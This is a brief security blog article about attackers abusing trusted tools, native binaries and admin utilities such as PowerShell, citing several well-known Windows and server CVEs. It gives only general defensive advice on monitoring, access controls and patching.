Attackers Exploiting Trusted Tools: 3 Reasons You’re Vulnerable

For years, the traditional approach to cybersecurity has been to block malware and stop attacks, but this model is no longer effective as threat actors have evolved their tactics.

Today, attackers are moving away from using malware and instead exploiting trusted tools, native binaries, and legitimate admin utilities that are already present within an organization’s environment.

This approach enables them to move laterally, escalate privileges, and persist without raising alarms, making it difficult for security teams to detect and respond to these types of attacks.

The abuse of trusted tools, such as those with known vulnerabilities like CVE-2017-0144, CVE-2019-0708, and CVE-2020-14882, is a significant concern as it allows attackers to blend in with normal network activity, making it challenging to identify malicious behavior.

Furthermore, the use of legitimate admin utilities, such as PowerShell, to carry out attacks, including those exploiting vulnerabilities like CVE-2021-42287 and CVE-2021-42288, has become increasingly common, highlighting the need for organizations to rethink their security strategies.

To stay ahead of these evolving threats, organizations must adopt a more proactive and comprehensive approach to security, one that includes monitoring for suspicious activity, implementing robust access controls, and regularly updating and patching software to prevent exploitation of known vulnerabilities like those in the Windows Print Spooler service, which was affected by the CVE-2021-1675 and CVE-2021-34527 vulnerabilities.

Source: Original Article

Press ESC to close

Share Article:

Tarang Parmar

The Era of ‘Doctor No’ in Enterprise Security Comes to an End

The Demise of Doctor No: Embracing Innovation in Enterprise Security